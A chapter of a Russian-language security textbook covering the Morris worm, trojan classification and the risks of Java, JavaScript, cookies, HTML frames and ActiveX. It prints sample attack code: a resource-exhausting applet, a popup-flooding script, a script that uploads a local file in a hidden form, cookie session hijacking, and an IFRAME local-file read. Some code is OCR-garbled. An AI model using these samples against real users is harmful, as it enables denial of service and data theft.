4.3. Средства нарушения безопасности сетей в АС
Если вирусы и троянские кони наносят ущерб посредством лавино- образного саморазмножения или явного разрушения, то основная функ- ция РПС, действующих в компьютерных сетях, — взлом атакуемой си- стемы, т.е. преодоление защиты с целью нарушения безопасности и це- лостности. В более 80% компьютерных преступлений, расследуемых ФБР, "взломщики" проникают в атакуемую систему через глобальную сеть In- ternet. Когда такая попытка удается, будущее компании, на создание ко- торой ушли годы, может быть поставлено под угрозу за какие-то секун- ды.
186 Этот процесс может быть автоматизирован с помощью специально- го вида РПС, называемого сетевой червь. Червями называют вирусы, которые распространяются по глобальным сетям, поражая целые системы, а не отдельные программы. Несомненно, это самый опасный вид вирусов, так как объектами нападения в этом случае становятся ин- формационные системы государственного масштаба. С появлением гло- бальной сети Internet этот вид нарушения безопасности представляет наибольшую угрозу, т. к. ему в любой момент может подвергнуться лю- бой из 30 миллионов компьютеров, подключенных к этой сети. Наиболее известен вызвавший всемирную сенсацию и привлекший внимание к вирусной проблеме инцидент с вирусом-червем в глобаль- ной сети Internet. Второго ноября 1988 года студент Корнелловского университета Роберт Моррис (Robert Morris) запустил на компьютере Массачусетского технологического института программу-червь, которая передавала свой код с машины на машину, используя ошибки в системе UNIX на компьютерах VAX и Sun. В течение 6 часов были поражены 6000 компьютеров, в том числе компьютеры Исследовательского инсти- тута НАСА и Национальной лаборатории Лоуренса в Ливерморе — объ- екты, на которых проводятся самые секретные стратегические исследо- вания и разработки. Червь представлял собой программу из 4000 строк на языке "С" и входном языке командного интерпретатора системы UNIX. Следует отметить, что вирус только распространялся по сети и не совершал каких-либо разрушающих действий. Однако это стало ясно только на этапе анализа его кода, а пока вирус распространялся, вычис- лительных центрах царила настоящая паника. Тысячи компьютеров бы- ли остановлены, ущерб составил многие миллионы долларов. Обычно целью взлома сетей является приобретение нелегальных прав на пользование ресурсами систем. Таким образом, если раньше РПС пассивно вносился систему, и для его инициализации необходимы был действия пользователя, то сейчас РПС сам проникает систему и са- мо определяет время и степень своей активности. Иногда взлому системы предшествует "разведка" исследование средств защиты атакуемой системы с целью обнаружения слабых мест и выбора оптимального метода атаки. Это могут быть как тривиальные попытки подбора паролей(кстати, 80% атак осуществляются именно этим способом) так и попытки проанализировать имеющееся на атакуе- мой машине программное обеспечение на предмет наличия в нем "дыр" или "люков", позволяющих злоумышленнику проникнуть в систему.
187 Таким образом, возникает специфический вид РПС — программы, осуществляющие проникновение в удаленную систему. Это дает воз- можность злоумышленнику лично, или с помощью других программ, осуществлять НСД к ресурсам этой системы, нарушать ее безопасность и целостность и т. д.
4.4. Классификация троянских программ
Троянские программы классифицируются по следующим призна- кам: по способу инсталляции по методам получения информации по режимам работы Классификация по способу инсталляции Троянские программы по способу инсталляции бывают с сетевыми, консольными или удаленными инсталляторами. К первому типу относятся BackOrifice, NetBus, всевозможные вари- ации на подобные темы и их производные. Доступ к компьютеру вла- дельца не нужен. Нужно только, чтобы компьютер-цель была видна (в случае локальной сети), либо был известен IP жертвы (в случае Internet). Консольная инсталляция требует от клиента доступа к терминалу владельца без его присутствия. Программы такого типа требуют ручной настройки и маскировки. Их можно использовать не только в хулиган- ских целях, но и в интересах собственной безопасности. Самой распро- страненной программой с подобным интерфейсом является HookDump. Технология ее использования довольно проста: достаточно запустить ее на машине владельца и, указав ей, за чем надо следить. Правда, получать информацию клиента придется с использованием консольного доступа. Удаленная инсталляция троянской программы в виде настроенного автоматизированного комплекса в рабочем состоянии посылается пись- мом или переписывается на носитель и вручается объекту-атаки. Тот пользуется полезной программой, которая временами дает поработать и троянской программы. Классификация по методам получения информации Троянские программы могут поддерживать сетевое, консольное ли- бо интерактивное предоставление информации клиенту. Это основные направления, существуют троянские программы, совмещающие все три типа в одном.
188 Сетевой тип представляет собой всего лишь почтовое письмо с ин- формацией, которая может быть полезна клиенту. Обычно такая инфор- мация шифруется или маскируется под вполне безобидные вещи - например, под электронную подпись PGP. Характер информации опре- деляется режимом работы троянской программы. Консольное предоставление информации - самый простой способ ведения записей, но немного неудобный при возникновении трудностей, относящихся к доступу к объекту-атаке. Кроме того, объем записей воз- растает и файлы большого объема могут послужить одной из улик, пер- вым шагом к разоблачению троянских программ. Интерактивный тип предоставления информации - обычно самый тя- желый в реализации механизма работы троянских программ, но с его по- мощью клиент может в некоторых случаях получить очень непредсказуе- мые результаты. Одной из таких программ является Network Crack Wizard. Классификация по режимам работы Троянские программы могут играть роль монитора, удаленного ад- министратора, суфлера, шпиона, робота либо маскирующего автомата типа партизан - 2000. Некоторые троянские программы совмещают в се- бе все типы. Монитор - пассивный наблюдатель, который просто наблюдает за "деятельностью в автоматизированной системе и записывает изменения состояния жертвы в специальный журнал, который потом может быть послан злоумышленнику или будет забран им самим. При этом можно задать фильтры - например, не записать события о работе с MS Word. Просто мониторы ставят очень редко, часто они работают и как системы удаленного администрирования, суфлер или шпион. Тогда производи- мые наблюдения послужат сигналом к началу каких-то более активных действий, выбору более выгодных - оптимальных для этого условий или собственной деинсталляции. Суфлер – это программа, которая, предназначена, чтобы подсказы- вать, что-то, а в некоторых случаях и полностью замещать владельца троянской программы (естественно, в некоторых - нужных клиенту слу- чаях). Довольно трудно сразу уяснить себе, где именно можно найти применение такой программа. Например, отправка сообщений, скачива- ние изображений, просто загрузка трафика, хранение скрытой информа- ции или порча важных документов в "c: .. \Мои документы". Роботы - программы, беспрекословно выполняющие команды кли- ента, имеющие базовый набор функций, которые можно вызывать,
189 например, посылкой почтой определенных слов где-то в тексте или в теме письма: From: spamer@inkognito.ru To: torjanowner@lamaz.com Subj: Хотите подпишу на anekdot.mail??? ... Робот, проверяющий почту еще при ее получении или позже в вхо- дящих сообщениях, обнаружит это сообщение (от spamer@inkognito.ru) и найдет там, например, слова anekdot.mail. Для него это может быть командой на отправку паролей на доступ к ftp-серверу и самоуничтоже- ние. Вообще говоря, отдача приказов может происходить различными способами, и конкретно на поведение троянской программы это не должно влиять никаким образом. Также следует отличать троянские программы-шпионы, которые управляются событиями (например, соединения с Internet вообще или с каким-то отдельным сервером в нем, приемом/отправкой почты или за- пуском ICQ/посылкой icq-сообщений). Все их реакции определяются ре- акцией на определенные события. И, наконец, последний тип этого класса - партизаны, мирно суще- ствующие в автоматизированной системе. Они управляются по событи- ям, то есть запустил пользователь, например, программу PGP, чтобы за- труднить чтение злоумышленником электронной почты, и разбудил вот такого партизана, который например, отключил систему шифрации PGP и стал передавать электронную почту менее защищенным способом.
4.5. Проблемы безопасности информации при распреде-
ленной обработки информации При распределенной обработки информации применяются следую- щие потенциально опасные технологии: 1. Java – технологий. 2. Технологии скриптов (сценариев). 3. Технологии cookes. 4. Технологии фреймов. 5. Технологии ActiveX. Рассмотрим проблемы безопасности этих технологий подробнее.
4.5.1. Особенности Java – технологий
Технология Java была разработана компанией Sun Microsystems в
начале 90-х годов в связи с возникновением острой необходимости в
190 компьютерных программах, ориентированных на использование в сете- вой среде и интеграцию с Web-сервисом. К таким программам изна- чально были предъявлены требования по мобильности, предполагающие независимость от аппаратных и операционных платформ, а также без- опасность и надежность обработки информации [15]. Для снижения сложности программирования и количества допуска- емых ошибок в язык Java были внесены жесткая объектная ориентация описаний и строгая типизация данных. Строгая типизация информаци- онных элементов позволяет на стадии компиляции выявлять ошибки, связанные с несовместимостью типов данных. Реализованный в языке модульный принцип построения программ и простота языка дают возможность не только быстро разрабатывать новые про граммы, но и применять элементы уже написанных и проверенных про грамм, а также эффективно модернизировать старые. Кроме того, в стандарт языка входит множество полезных библиотек, на основе кото- рых можно строить вычислительные системы любой сложности. Этот стандартный на бор постоянно пополняется новыми важными функция- ми. Независимость от аппаратно-операционных платформ, а также без- опасность и надежность обработки информации были достигнуты разра- боткой виртуального Java-процессора, предназначенного для выполне- ния Java-программ путем их интерпретации. Определены его архитекту- ра, представление элементов данных и система команд. Виртуальный Java-процессор обеспечивает среду для исполнения Java-программ. При этом любая Java-программа должна соответствовать спецификации этого абстрактного процессора, которая полностью опре- деляет его машинно-независимую систему команд, типы обрабатываемых данных, а также регистры. Поэтому для возможности исполнения Java- программы виртуальным Java-процессором ее исходные тексты должны быть оттранслированы в высокоуровневые машинно-независимые коды этого абстрактного процессора, называемые байт-кодами. Оттранслированные Java-программы, предназначенные для выпол- нения на рабочей станции в среде Web- браузера, называют Java- аплетами или мобильным кодом. По своей структуре каждый аплет представляет собой не большую программку, в которой должно быть определено несколько обязательных функций. Аплет загружается по се- ти с сервера и выполняется в среде Web- браузера (см. рис. 31). Ссылки на аплеты располагаются в Web-документах, но непосредственно в со- став Web-документов аплеты не входят. Они хранятся в отдельных фай-
191 лах на сервере. Виртуального Java-процессора, который и предназначен для интерпретации аплетов.
Рис. 31. Схема передачи и выполнение Java-аплетов
Байт-коды разрабатывались так, чтобы максимально сократить сред- нюю длину команды. Java-процессор имеет минимум регистров, стеко- вую архитектуру и часто использует косвенную адресацию. Поэтому большинство из команд занимает всего один байт, к которому добавляет- ся при необходимости номер операнда. Кроме того, для обработки каждо- го типа данных Java-процессор имеет свой набор команд. В результате средняя длина Java-команды составляет всего 1,8 байта. Средняя длина команды для классических RISC-процессоров равна примерно 4 байтам. Для высокой надежности и безопасности выполнения Java-аплетов предусмотрены две важные функции: проверка байт-кодов перед их выполнением на целостность и пра- вильность инструкций; контроль и блокирование опасных действий в процессе интерпре- тации байт-кодов. Первую функцию реализует загрузчик и верификатор байт-кодов, а вторую — диспетчер безопасности виртуального Java-процессора. Дис- петчер безопасности запрещает аплетам осуществлять доступ к файлам и периферийным устройствам, а также выполнять системные функции, такие как распределение памяти. Виртуальный Java-процессор обеспечивает выполнение и других
192 функций, влияющих на надежность обработки информации, например, освобождение неиспользуемой оперативной памяти. Кроме того, язык Java содержит необходимые средства для корректной работы со всеми объек- тами и ресурсами в случае возникновения исключительных ситуаций. Технологический цикл подготовки Java-аплетов тот же, что и для программ на других языках программирования. Отличием является лишь то, что при редактировании внешних связей требуемые компоненты мо- гут доставляться по сети. Процесс выполнения аплетов существенно от- личается от аналогичного процесса для обычных программ (см. рис. 32).
Подготовка аплетов Выполнение аплетов
Исходные Виртуальный Java-
тексты на процессор языке Java Загрузка и проверка байт-кодов Компиляция и редактирование внешних связей Передача байт-кодов по Интерпретация байт- сети кодов с контролем и Байт-коды блокированием Java опасных действий
Рис. 32. Схема подготовки и выполнения Java-аплетов.
Поскольку аплеты и другие части прикладной системы хранятся на сервере, то за счет централизации облегчается сопровождение и админи- стрирование системы. Это в свою очередь гарантирует, что пользователь всегда будет использовать самые последние версии программ. Следует отметить, что на языке Java могут создаваться не только аплеты, являющиеся мигрирующими программами, но и стационарные программные приложения. Однако для высокого быстродействия исход- ный текст таких программ следует компилировать не в байт-коды, а в машинно-зависимые коды, обеспечивающие высокую скорость исполне- ния. В настоящее время существует достаточное количество инструмен-
193 тальных средств для разработки как Java-аплетов, так и Java- приложений. Среди них — Microsoft Visual J++, Symantec Cafe, Borland Jbuilder, Sun Microsystems Java Workshop и ряд других.
4.5.2. Проблемы безопасности языков сценариев
Параллельно с мощной Java-технологией появились технологии со-
здания и применения мигрирующих программ, основанные на использо- вании языков сценариев [17]. Наиболее важным отличием таких техно- логий от Java-технологии является покомандная интерпретация исход- ных текстов программ, исключающая необходимость их компиляции перед выполнением. Вспомним, что в Java-технологии мобильная Java- программа для возможности выполнения должна быть откомпилирована в байт-коды. Функция интерпретации мобильного кода, написанного на языке сценариев, возложена на Web- браузер. Языки сценариев часто называют еще языками скриптов (script — сценарий) или макроязыками. Их интерпретируемая природа упрощает отладку и создание составленных на них программ. К основным пред- ставителям языков сценариев, предназначенных для написания мигри- рующих программ, относятся: язык JavaScript, разработанный совместно компаниями Netscape и Sun Microsystems, а также подобный ему язык VBScript от Microsoft; язык VRML, разработанный компанией Silicon Graphics. Язык сценариев JavaScript впервые появился в Web- браузере Netscape Navigator 2.0 под названием Live Script. JavaScript не представ- ляет собой производную от Java (см. табл. 8).
Таблица 8 Сравнительные характеристики языков Java и JavaScript
Java JavaScript Программа для возможности выполнения Программа интерпретируется на стороне на стороне клиента откомпилирована в клиента в исходном виде. байт коды. Объектно-ориентирован. Аплеты обра- Объектно-базирован. Отсутствуют клас- зуют объектные классы с наследованием. сы и механизм наследования.
194 Аплеты вызываются из Web-страниц, но Программы вызываются из Web–страниц страницы хранятся обособленно от Web- и встроены непосредственно в Web- документов. документы. Статическое связывание. Объектные Динамическое связывание. Объектные ссылки должны существовать на этапе ссылки проверяются во время выполне- компиляции. ния. Типы данных и переменные должны Типы данных и переменные не объявля- быть объявлены. ются. Не может осуществляться запись в дис- Не может осуществляться запись в дис- ковую память и выполнять системные ковую память и выполнять системные функции. функции. JavaScript является упрощенным интерпретируемым языком с базо- выми объектно-ориентированными функциями. Свойство простоты объ- ясняется отсутствием жесткой архитектуры типов и семантики. Объект- но-ориентированная ориентация проявляется в возможностях работы с окнами, строкой состояния и другими элементами интерфейса Web- браузера и сетевого окружения как с объектами в иерархии, к которым можно обращаться по имени. JavaScript беднее языка Java, но гораздо удобнее и эффективнее для ряда за дач, связанных с обработкой Web-документов и взаимодействи- ем с пользователем при его просмотре. Он имеет большое число встро- енных функций и команд. Программы, написанные с помощью JavaS- cript, могут выводить на экран диалоговые окна, производить математи- ческие вычисления, проигрывать различные аудио- и видеофайлы, полу- чать новые документы, обрабатывать нажатие на кнопки в формах и многое другое. С помощью JavaScript можно также устанавливать атри- буты и свойства бинарных библиотек Java, a также программных моду- лей (plug-ins), подключенных к Web- браузеру. Команды JavaScript встраиваются непосредственно в Web-страницу и выполняются Web- браузером во время загрузки этой страницы или во время определенных действий, производимых пользователем при работе с ней например, при щелчке мышью на одном из объектов страницы, при позиционировании указателя в место расположения ссылки или при вводе ин формации в поля HTML-формы. Как и для любой другой технологии или языка, используемого в вычислительной сети, обеспечение безопасности обработки информации является первоочередной задачей. В JavaScript не реализованы некото- рые возможности, поскольку они косвенно делают защиту более уязви- мой. Программе на JavaScript, как и программе на языке Java, запрещено выполнять операции с локальными файлами. Поэтому программа не в состоянии изменять или получать доступ к пользовательским данным.
195 Кроме того, язык JavaScript не поддерживает сетевые функции. Он не может, напрямую открыть порт TCP/IP, а способен только обеспечить загрузку объекта по заданному адресу и формирование данных, переда- ваемых Web-серверам. Современные браузеры позволяют устанавливать уровни безопасности и управлять ими так, что программа на JavaScript может обратиться только к ограниченному кругу информации. Быстрота создания программ, небольшие размеры программных модулей, удобный доступ ко всем внутренним функциям браузера, а также безопасность JavaScript-технологии привели к высокой популяр- ности языка JavaScript, не уступающей популярности языка Java. К недостаткам технологии JavaScript следует отнести невысокое быстродействие JavaScript-программ, являющееся неотъемлемым атри- бутом всех интерпретируемых языков программирования. Необходимо отметить, что реализации языка JavaScript компаний Netscape и Microsoft различаются. Эти браузеры Netscape Navigator и In- ternet Explorer. Поэтому при создании приложений на JavaScript необхо- дима проверка их работоспособности в среде различных программ нави- гации. Язык сценариев VBScript от Microsoft во многом подобен JavaScript. Он является подмножеством языка Visual Basic и также пред- назначен для программирования Web страниц. С его помощью можно заставить взаимодействовать разные объекты на Web-странице, включая программные компоненты другого типа, например, аплеты Java и про- граммные компоненты ActiveX Controls. В отличие от макроязыков JavaScript и VBScript язык VRML разра- ботан корпорацией Silicon Graphics специально для создания интерпре- тируемых программ, моделирующих трехмерные виртуальные миры. Интерпретаторы VRML подключаются к браузерам чаще всего в виде отдельных программных модулей (plug-ins). Исходные тексты программ на языке VRML оформляются в виде отдельного VRML-файла и вызы- ваются по ссылке с Web-документа при его просмотре браузером. Щел- чок мышью по такой ссылке приводит к открытию отдельного окна, позволяющего пройтись по расположенному в нем фрагменту трехмер- ной реальности.
4.5.3. Типовые уязвимости в системе защиты Java
Ошибки JVM браузера Netscape Communicator
В апреле 1999 года была обнаружена уязвимость важного компо- нента безопасности JVM браузера Netscape Communicator. При опреде-
196 ленных обстоятельствах виртуальная машина Java не проверяет загру- жаемый в нее код. Использование этого изъяна позволяет взломщику за- пустить код, разрушающий механизмы проверки типов Java, и реализо- вать взлом со смешением типов. Уязвимость в механизме обеспечения безопасности Microsoft Java В браузере Internet Explorer вскоре была обнаружена аналогичная ошибка. Из-за недостатков реализации механизма обеспечения безопас- ности в JVM компании Microsoft появилась возможность полностью обойти механизмы защиты с помощью хитро запрограммированного аплета, размещенного на удаленном Web-сервере, или встроенного в со- общение электронной почты в формате HTML. Brown Orifice и новые ошибки в Java Летом 2000 года появилась информации о двух выявленных уязви- мостях, относящихся к реализации Java в Netscape Communicator. В част- ности, было установлено, что в файлах библиотек классов Java при вы- полнении определенных операций не выполняется надлежащая проверка безопасности или результаты этой проверки игнорируются. В число клас- сов, о которых идет речь, входит класс java.net.ServerSocket, используе- мый для создания прослушиваемых сетевых сокетов для входящих сете- вых соединений, а также классы Netscape.net. URLConnection и Netscape.net.URLinputSteam, содержащие абстрактные стандартные мето- ды чтения локальных файлов. Во всех этих трех классах содержатся ме- тоды, в которых некорректно вызывается метод SecurityManager.check, определяющий, действительно ли данный аплет обладает правами досту- па, необходимыми для выполнения некоторых действий. Если проверка завершилась неудачей, то это исключение игнорируется. Оба этих изъяна были заложены в реализацию аплета Java, в кото- ром перечисленные методы служат для создания портов прослушивания и получения права на чтение файловой системы. Программа поддерживает возможности, подобные возможностям программного продукта Napster, позволяя пользователям совместно ра- ботать с файлами через одноранговую сеть, которая создается миллио- нами пользователей, ведущих обмен данными с помощью протокола HTTP. Примеры зловредных Java-аплет и скриптов Атакующий Java-аплет Java-аплет может быть встроен в код html-документа и запущен на исполнение при открытии страницы Web-сайта. Простейший вариант
197 атакующего Java-аплета приведен ниже. Функция, активизирующая при отпускании клавиши мыши должна "забить" GDI-ресурсы клиентской станции. public boolean mouseUp(Event evt, int x, int y) { Image img = createImage(600, 400); Graphics gc = img.getGraphics(); int max = 0x7fffffff; int min = 0x80000000; if(!fried) { gc.drawLine(299, 924, max, max); fried = true; } else {Graphics g = getGraphics(); g.setColor(Color.black); g.fillRect(0, 0, size().width, size().height); g.setColor(Color.white); FontMetrics fm = g.getFontMetrics(); String s = "Working, please wait... The damage might be worse each time you press the button!"; g.drawString(s, (size().width - fm.stringWidth(s)) / 2, (size().height - fm.getHeight()) / 2); for(int i = 0; i < 10000; i++) {int lx = (int)(Math.random() * 2000D) - 1000; int ly = (int)(Math.random() * 2000D) - 1000; gc.setColor(new Color((int)(Math.random() * 16777215D))); gc.drawLine(lx, ly, max, max); gc.drawLine(lx, ly, min, min); gc.drawLine(lx, ly, min, max); gc.drawLine(lx, ly, max, min);} gc.drawImage(background, 0, 0, this); getGraphics().drawImage(img, 0, 0, this); ultraFried = true;} repaint(); return true;}
Атакующий JavaScript Сразу приведем пример атакующего скрипта: <SCRIPT LANGUAGE="JavaScript"> function WindowBomber() {var Counter = 0 while (true) {window.open("http://www.rambler.ru","Crash"+Counter,"width=1,height=1,resizable=no")
198 Counter++ }} </SCRIPT> Скрипт начинает открывать Popup-окна до тех пор, пока Windows- система не зависнет.
Разведчик на JavaScript Простейшая реализация на Java-script скрипта-разведчика связана с брешью в безопасности Internet Explorer, позволяющей выполнять ко- манды Copy и Paste, и отправлять форму без ведома пользователя. B html есть поле ввода "выбор файла", изначально созданное для отправки файлов на сервер. Обычно это поле заполняет пользователь и подтвер- ждает свое действие нажатием кнопки submit. Для реализации скрипта- разведчика создается форма со скрытым полем <input type="hidden" name="h1" value="c:\config.sys">, поле для выбора файлов <input type="file" name="filename" value="c:\config.sys">, после чего пишется следующий Java-Script, автоматически вызывающийся по событию при каком-либо действии пользователя, например при загрузке страницы: <body onLoad="getFile()">: <Script language="JavaScript"> function getFile() {document.forms[1].h1.select(); document.execCommand("copy"); document.forms[0].filename.select(); document.execCommand("paste"); document.submit(); } </Script>
4.5.4. Особенности технологии Cookies
Cookies называются небольшие программы, необходимые для со-
здания Web-узлов и специально разработанные для того, чтобы преодо- леть анонимную природу World Wide Web (WWW). Применение данной технологии позволяет операторам сайтов накапливать некоторую иден- тифицирующую информацию непосредственно на машине клиента. А это, в свою очередь, дает возможность хозяину Web-узла узнавать, с кем он имеет дело при его посещении пользователем [15]. Собственно cookies — это заголовок Hypertext Transfer Protocol (HTTP), содержащий строку, которую браузер сохраняет в небольшом текстовом файле на жестком диске пользователя в каталоге Windows\Cookies (для Microsoft Internet Explorer) или Users folder (для
199 Netscape Navigator). По размеру cookies могут достигать 4 Kбайт, но обычно не превышают пары сотен байтов. HTTP не может сказать, кому он посылает страницы или какие дру- гие страницы уже переданы им какому-либо конкретному пользователю. Это было сделано намеренно, для эффективного осуществления сервер- ных операций, поскольку HTTP не загружен сопровождением пользова- телей. Однако это означает значительное увеличение объема работы для сетевых операторов, желающих узнать, кто находится на другом конце линии. Cookies обеспечивают Web-узел подобной информацией, отслежи- вая перемещения пользователя по сайту со страницы на страницу. Так, например, cookies могут использоваться для того, чтобы определить, на какой странице (PC или Macintosh) должен обслуживаться клиент при загрузке ПО. Cookies позволяют собирать о посетителях достаточно информации, чтобы в будущем можно было точно определить, кто они и что им нуж- но. В зависимости от возможностей базы данных сервера эта информа- ция может быть минимальной. Например, если вы используете таблич- ную базу данных для записи сведений про вхождение клиента, предпо- читаемую им форму оплаты, адрес поставки и содержимое его покупа- тельской корзины, то единственное, что вам нужно сохранять в cookies — это указатель на запись про клиента в таблице. Это намного более эффективно и безопасно, чем использовать cookies для сохранения всех данных регистрационной формы пользователя. Cookies вовсе не являются единственным способом передачи пер- сональных данных. Задолго до того, как они появились, существовало, по крайней мере, два метода, которые использовались с этой целью: пе- редача данных через спрятанные поля в форме или их прибавление в конце URL (унифицированного указателя ресурса WWW). Однако и спрятанные поля, и использование URL имеют суще- ственные недостатки. Чтобы использовать спрятанные поля, вам нужно будет обрабатывать каждый запрос на страницу как form Submit (посту- пивший на рассмотрение), что выглядит все более анахроничным в эпо- ху динамичного Hypertext Markup Language (HTML). Метод же URL- суффикс неудовлетворителен с точки зрения безопасности, поскольку не только показывает, откуда пришел запрос, но и может сообщить любо- пытным имя и пароль пользователя. Прочитать cookies может только сервер сайта, который его создал, а сберегаться в нем может только информация, предоставленная узлом
200 или самим пользователем. Cookies не обладают способностью ни про- сматривать содержимое жесткого диска пользователя, ни передавать частную информацию клиента в Internet. Они являются электронным блокнотом для Web-сайта. Так cookies могут быть использованы для отслеживания действий пользователей в WWW. С помощью cookies можно создавать профили клиентов и встречать их соответствующей рекламой преследовали цель полнее удовлетворить интересы пользователей. При каждом подключе- нии клиента к узлу, сервер читает и/или записывает cookies на его жест- кий диск, накапливая при этом обширную информацию о действиях пользователя на сайте. Операторы Web-узлов могут создавать cookies с помощью про- грамм CGI или JavaScript. JavaScript проще и не требует программиро- вания сервера. Однако как при использовании CGI, так и любого другого инструмента сервера, непосредственным создателем cookie является Document Object браузера. Таким образом, то ли вы применяете CGI, Microsoft Active Server Pages (поддерживаемые IIS 3.0 или более позд- ними версиями), то ли JavaScript, вы используете тот же самый код, что- бы приказать браузеру прочитать, написать или уничтожить cookie. Кроме того, есть очень много простых примеров с JavaScript-кодом для работы с cookies, которыми может воспользоваться злоумышленник.
4.5.5. Типовые уязвимости файлов Cookies
Перехват файлов cookies
Самый прямой способ заключается в перехвате файлов cookies при их передаче по се ти. Затем перехваченные данные можно использовать при входе на соответствующий сервер. Такую задачу можно решить с помощью любой утилиты перехвата пакетов. Следующий пример явля- ется фрагментом восстановленного сеанса связи, во время которого файл cookies служит для аутентификации и управления доступом к про- сматриваемым страницам. SЕТ http://www.victim.net/images/logo.gif HTTP/1.0 Accept: / Referrer: http://www.victim.net/ Host: www.victim.netCookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah В приведенном примере виден фрагмент cookies, помещенный в по- ступающий на сер вер запрос HTTP. Наиболее важным является поле
201 cuid, в котором задается уникальный идентификатор, используемый при аутентификации пользователя на узле www.victim.net. Допустим, что после этого взломщик посетил узел victim.net, получил собственный идентификатор и файл cookies (предполагается, что узел помещает дан- ные cookies не в виртуальную память, а записывает их на жесткий диск). Тогда взломщик может открыть свой собственный файл cookies и заме- нить в нем идентификатор поля cuid, взяв его из перехваченного пакета. В этом случае при входе на сервер victim.net он будет восприниматься как пользователь, чьи данные cookies были перехвачены. Способность специальных программ воспроизводить весь сеанс связи или его фрагмент значительно облегчает реализацию атак этого типа. С их помощью можно повторно извлечь страницы, которые про- сматривались пользователем, используя его данные cookies, перехвачен- ные ранее, увидеть информацию о вы полненных распоряжениях, предо- ставить полную запись трафика в расшифрованном виде. Захват файлов cookie через URL Специалистам известен сценарий, который извлекает файлы cookie с клиентского компьютера, если его пользователь щелкает на ссылке, со держащейся на этой странице. В результате содержимое файла cookies становится доступным для операторов Web-узла. Эту возможность можно использовать в неблаговидных целях, внедряя дескрипторы IFRAME в HTML-код Web-страницы, электронно- го сообщения в формате HTML или со общения из группы новостей. В интернете демонстрируется возможность использования дескрипторов IFRAME совместно с утилитой Peacefire. Кроме того, имеется возможность составления электронного сооб- щения, которое "захватывало" бы файлы cookies с жесткого диска поль- зователя и передавало их на необходимый узел.
4.5.6. Особенности и типовые уязвимости HTML
Изъяны фреймов HTML в Internet Explorer
Особенностью браузера Internet Explorer является возможность ис- пользования доменной модели обеспечения безопасности ("cross-domain security model"). Вкратце это означает следующее. Описываемая модель скрыто ис- пользуется и предотвращает чтение, доступ и любые другие операции с данными, открытыми в окне одного узла (простейшая форма домена IE), со стороны окна другого узла. При таком подходе фреймы HTML, от-
202 крытые в каком-либо окне, должны быть доступны только из родитель- ского окна при условии, что оба они относятся к одному и тому же до- мену. Интересной особенностью этой модели является то, что локальная файловая сис тема, содержимое которой можно просматривать с помо- щью Internet Explorer, тоже рассматривается как домен. Таким образом, при нарушении доменной безопасности в распоряжении нечестных опе- раторов Web-узлов окажется много возможностей про смотра данных не только других узлов, посещаемых пользователем, но и файлов, которые находятся на жестком диске посетителя сайта. Используя некоторые из возможных подходов, достаточно написать лишь несколь ко строк кода и поместить его на Web-узле или отправить в электронном сообщении. Чтение других доменов с помощью дескриптора IFRAME Экспертами в области безопасности броузеров обнаружено не- сколько случаев нарушения модели доменной безопасности, предотвра- щающей обмен данными между доменами. При реализации кода используется дескриптор IFRAME, который уже упоминался выше. Этот дескриптор является расширением стандар- та HTML 4.O. В отличие от стандартного дескриптора FRAME, IFRAME позволяет создать плавающий фрейм, который располагается посредине обычной Web-страницы, не содержащей фреймов, подобно вставленно- му в нее изображению. Это довольно простой способ вставки содержи- мого других узлов (и даже файловой системы) внутрь Web-страницы, который прекрасно подходит для скрытого получения доступа к данным других доменов. Описываемая реализация представляет собой замечательный при- мер. В исходном файле дескриптор IFRAME служит для задания ло- кального файла. Затем в IFRAME вставляется код JavaScript, который выполняется в домене файловой системы. Если нечестный оператор Web-узла знает имя файла (или может о нем догадаться) и его местопо- ложение, то при желании он сможет просмотреть файл любого типа, ко- торый может быть открыт в окне браузера. Например, файл winnt\repair\sam._ таким способом прочитать не удастся, поскольку при этом на экран будет выведено диалоговое окно загрузки файла IE. В ин- тернете имеется пример кода, который считывает файл C:\test.txt (при условии, что он существует на диске пользователя). Проверка принад- лежности к доменам Internet Explorer
203 В июне 2000 года было обнаружено, что в Internet Explorer две функции не выполняют надлежащую проверку принадлежности к доме- ну. Это позволяет создать такую страницу HTML, которая открывала бы фрейм с локальным файлом и могла читать этот файл Пример использования подобной уязвимости приведен ниже. <IFRAME ID="I1"X/IFRAME> <SCRIPT for=Il event="NavigateComplete2(b)"> „alertC'Here is your file:\n"+b.document.body.innerText); </SCRIPT> <SCRIPT> fl.navigate("file://c:/test.txt"); 'ietTimeout('II.navigate("file://c:/test.txt") ', 1000) ; </SCRIPT> Как и в предыдущем случае, в качестве цели был избран файл test. Но с таким же успехом можно считать любой другой файл системы пользователя, который можно посмотреть в браузере. Для этого нужно внести соответствующие изменения в строку file://c:/test.txt. Пример использования другой уязвимости Internet Exlorer, приво- дящей к сбою работы программы приведен ниже.
<body on load = "window();">
</body>
4.5.7. Особенности технологии ActiveX
Под ActiveX понимается набор технологий от Microsoft, направлен-
ных на дополнение, интеграцию и унификацию существующих методов представления и обработки информации в компьютерных сетях, постро- енных по Web-архитектуре [15]. Основная идея ActiveX-технологий за- ключается в использовании одинакового способа доступа ко всем ин- формационным ресурсам сети (см. рис. 33). В качестве основы такого унифицированного способа доступа выбрана Web-технология.
204 Рис. 33. Схема доступа к информационным ресурсам сети В соответствии с ActiveX браузер должен стать частью операцион- ной системы. Более того, методы доступа к любой информации на соб- ственном компьютере, на сервере локальной сети или в Internet должны быть совершенно одинаковы и прозрачны для пользователя. С точки зрения разработки мобильных программ набор технологий ActiveX с одной стороны выступает как альтернатива, а с другой — как существенное дополнение технологий Java и JavaScript. ActiveX обеспе- чивает не толь ко разработку и выполнение мобильных программ, но и реализацию ряда дополнительных возможностей, например, вызов из среды браузера функций по просмотру и редактированию документов Word, Excel и Power Point. В распоряжение программистов и авторов Web-документов ActiveX предоставляет набор функций API (Application Program Interface), реализованный как для клиента, так и для сервера. ActiveX поддерживает следующие типы мобильных программ, ко- торые могут быть связаны с Web-документом и передаваться на рабо- чую станцию для выполнения (см. рис. 34): программные компоненты ActiveX Controls; аплеты Java; программы, написанные на языках JavaScript, VBScript и VRML.
205 Рабочая Cервер станция
Операционная Операционная система Программные система Windows компоненты ActiveX NT Server Web- Controls Web–сервер навигатор, Internet поддерживаю Information щий ActiveX Server (Internet Аплеты Java Explorer) ISAPI и CGI
Виртуальный Java- процессор Программы составленные на СУБД и другие языках сценариев приложения
Рис. 34. Миграция программ в технологии ActiveX
